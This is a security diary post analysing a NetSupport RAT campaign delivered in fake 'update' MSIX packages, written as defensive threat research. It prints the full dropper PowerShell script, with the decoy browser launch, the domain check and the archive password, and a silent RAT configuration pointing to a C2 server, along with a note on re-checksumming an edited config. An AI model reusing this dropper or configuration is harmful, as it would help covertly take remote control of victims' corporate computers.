New NetSupport Campaign Delivered Through MSIX Packages

Published: 2024-06-17. Last Updated: 2024-06-17 07:22:40 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

It's amazing to see how attackers reuse and combine known techniques to target their victims with new campaigns! Last week, I spotted some malicious MSIX packages on VT that drop a NetSupport[1] client preconfigured to phone home to an attacker's controlled manager. Remote support tools are really "cool" for attackers because they provide a perfect way to communicate with infected computers without the need to develop their own C2 infrastructure and protocol! If some are popular and often searched as evidence of compromise, like AnyDesk or TeamViewer), there are others, like NetSupport, that tend to remain below the radar. This one is available for free for 30 days (more than enough to launch a campaign) and provides all the expected features to interact with victims:

Let's have a look at one example of a malicious MSIX file: update_12_06_2024_5903695.msix (SHA256:e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4). The file has a very low detection score (4/69)[2]. The file contains all the components to download and install the NetSupport client:

# zipdump.py update_12_06_2024_5903695.msix 
Index Filename                                            Encrypted Timestamp           
    1 Registry.dat                                                0 2024-06-12 08:10:20 
    2 User.dat                                                    0 2024-06-12 08:10:20 
    3 Assets/logo.png                                             0 2024-06-12 08:10:20 
    4 config.json                                                 0 2024-06-12 08:10:20 
    5 fix.ps1                                                     0 2024-06-12 08:10:20 
    6 PsfLauncher32.exe                                           0 2024-06-12 08:10:20 
    7 PsfLauncher64.exe                                           0 2024-06-12 08:10:20 
    8 PsfRunDll32.exe                                             0 2024-06-12 08:10:20 
    9 PsfRunDll64.exe                                             0 2024-06-12 08:10:20 
   10 PsfRuntime32.dll                                            0 2024-06-12 08:10:20 
   11 PsfRuntime64.dll                                            0 2024-06-12 08:10:20 
   12 Resources.pri                                               0 2024-06-12 08:10:20 
   13 StartingScriptWrapper.ps1                                   0 2024-06-12 08:10:20 
   14 VFS/ProgramFilesX64/7z2404-extra/7za.dll                    0 2024-06-12 08:10:20 
   15 VFS/ProgramFilesX64/7z2404-extra/7za.exe                    0 2024-06-12 08:10:20 
   16 VFS/ProgramFilesX64/7z2404-extra/7zxa.dll                   0 2024-06-12 08:10:20 
   17 VFS/ProgramFilesX64/7z2404-extra/arm64/7-ZipFar.dll         0 2024-06-12 08:10:20 
   18 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.dll              0 2024-06-12 08:10:20 
   19 VFS/ProgramFilesX64/7z2404-extra/arm64/7za.exe              0 2024-06-12 08:10:20 
   20 VFS/ProgramFilesX64/7z2404-extra/arm64/7zxa.dll             0 2024-06-12 08:10:20 
   21 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.hlf           0 2024-06-12 08:10:20 
   22 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipEng.lng           0 2024-06-12 08:10:20 
   23 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar.dll           0 2024-06-12 08:10:20 
   24 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipFar64.dll         0 2024-06-12 08:10:20 
   25 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.hlf           0 2024-06-12 08:10:20 
   26 VFS/ProgramFilesX64/7z2404-extra/Far/7-ZipRus.lng           0 2024-06-12 08:10:20 
   27 VFS/ProgramFilesX64/7z2404-extra/Far/7zToFar.ini            0 2024-06-12 08:10:20 
   28 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.reg              0 2024-06-12 08:10:20 
   29 VFS/ProgramFilesX64/7z2404-extra/Far/far7z.txt              0 2024-06-12 08:10:20 
   30 VFS/ProgramFilesX64/7z2404-extra/history.txt                0 2024-06-12 08:10:20 
   31 VFS/ProgramFilesX64/7z2404-extra/License.txt                0 2024-06-12 08:10:20 
   32 VFS/ProgramFilesX64/7z2404-extra/readme.txt                 0 2024-06-12 08:10:20 
   33 VFS/ProgramFilesX64/7z2404-extra/x64/7za.dll                0 2024-06-12 08:10:20 
   34 VFS/ProgramFilesX64/7z2404-extra/x64/7za.exe                0 2024-06-12 08:10:20 
   35 VFS/ProgramFilesX64/7z2404-extra/x64/7zxa.dll               0 2024-06-12 08:10:20 
   36 VFS/ProgramFilesX64/client2.7z                              0 2024-06-12 08:10:20 
   37 VFS/ProgramFilesX64/PsfRunDll64.exe                         0 2024-06-12 08:10:20 
   38 AppxManifest.xml                                            0 2024-06-12 08:10:20 
   39 AppxBlockMap.xml                                            0 2024-06-12 08:10:20 
   40 [Content_Types].xml                                         0 2024-06-12 08:10:20 
   41 AppxMetadata/CodeIntegrity.cat                              0 2024-06-12 08:10:20 
   42 AppxSignature.p7x                                           0 2024-06-12 08:10:48 

You can see that a portable 7zip version is included in the file. It will be used to unpack the NetSupport client stored in the client2.7z file. Everything will happen in fix.ps1:

# zipdump.py update_12_06_2024_5903695.msix -s 5 -d
$url = "https://www.google.com/intl/en_en/chrome/"
Start-Process $url

$domain = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain

if ($domain -eq "WORKGROUP") {
} else {
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e VFS\ProgramFilesX64\client2.7z -oC:\Users\Public\Documents\Client -p88888888"
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e C:\Users\Public\Documents\Client\client1.7z -oC:\Users\Public\Documents\Client -p88888888"
    $path = "C:\Users\Public\Documents\Client\client32.exe"
    Start-Process $path
}

First, the script will open a browser and display the Chrome download page to defeat the victim. Then, the script will verify if the computer is part of a Microsoft domain (read: a corporate computer). If not, the client won't be installed. 

The NetSupport client is double-compressed in client2.7z then client1.7z:

# 7z l client1.7z 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz (906ED),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1510337 bytes (1475 KiB)

Listing archive: client1.7z

--
Path = client1.7z
Type = 7z
Physical Size = 1510337
Headers Size = 545
Method = LZMA2:6m BCJ 7zAES
Solid = +
Blocks = 2

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2024-06-12 10:47:36 D....            0            0  client
2024-06-12 08:07:49 ....A          652          960  client/client32.ini
2007-07-06 13:07:32 ....A          328               client/nskbfltr.inf
2024-06-12 10:49:40 ....A         1369               client/NSM.LIC
2010-04-27 05:26:38 ....A           46               client/nsm_vpro.ini
2016-12-07 00:03:12 ....A        93560      1508832  client/AudioCapture.dll
2024-06-12 10:48:13 ....A        55459               client/client32.exe
2016-04-26 20:55:34 ....A       328056               client/HTCTL32.DLL
2015-04-24 17:27:28 ....A       773968               client/msvcr100.dll
2016-04-26 20:59:04 ....A        33144               client/pcicapi.dll
2016-04-26 20:59:10 ....A        18808               client/PCICHEK.DLL
2023-06-11 18:51:36 ....A      3710280               client/PCICL32.DLL
2023-06-13 13:01:09 ....A        63320               client/remcmdstub.exe
2023-06-13 13:35:38 ....A       391832               client/TCCTL32.DLL
------------------- ----- ------------ ------------  ------------------------
2024-06-12 10:49:40            5470822      1509792  13 files, 1 folders

The client32.ini discloses the IP address of the NetSupport Manager (the C2):

# cat client/client32.ini 
0x1c42f29c

[Client]
_present=1
AlwaysOnTop=0
AutoICFConfig=1
DisableChat=1
DisableChatMenu=1
DisableDisconnect=1
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
Protocols=3
Shared=1
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=0
Usernames=*
ValidAddresses.TCP=*

[_Info]
Filename=C:\Users\Public\Pictures\client32u.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[General]
BeepUsingSpeaker=0

[HTTP]
CMPI=60
GatewayAddress=38[.]135[.]52[.]140:443
GSK=GK;OAKDA9C<I?PBGFF9F>D@KHF:J<P
SecondaryGateway=
SecondaryPort=443

[TCPIP]
MulticastListenAddress=

The C2 server (down at this time) is 38[.]135[.]52[.]140 and uses HTTPS. GSK is the shared key used to encrypt communications.

Note the first line (the hex value): It's a checksum of the configuration file. Any change in the file will make it unusable. But, NetSupport has a great support tool called cksini.exe that helps to generate the checksum of a manually edited configuration file:

C:\Temp>cksini
Generate checksum for .INI file
Checksum is: 0xfbaa0e3e
Output is in file: client32.ini

Malicious MSIX files are not new[3], NetSupport has already been heavily used by attackers in the past[4]  but they remain a very good combination to compromise more victims and... at a very low cost for attackers!

[1] https://www.netsupportmanager.com
[2] https://www.virustotal.com/gui/file/e77bd0bf2c2f5f0094126f34de49ea5d4304a094121307603916ae3c50dfcfe4
[3] https://isc.sans.edu/diary/Redline+Dropped+Through+MSIX+Package/30404
[4] https://isc.sans.edu/diary/sczriptzzbn+inject+pushes+malware+for+NetSupport+RAT/29170

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Monday, June 17th, 2024 https://isc.sans.edu/podcastdetail/9026

Comments


Diary Archives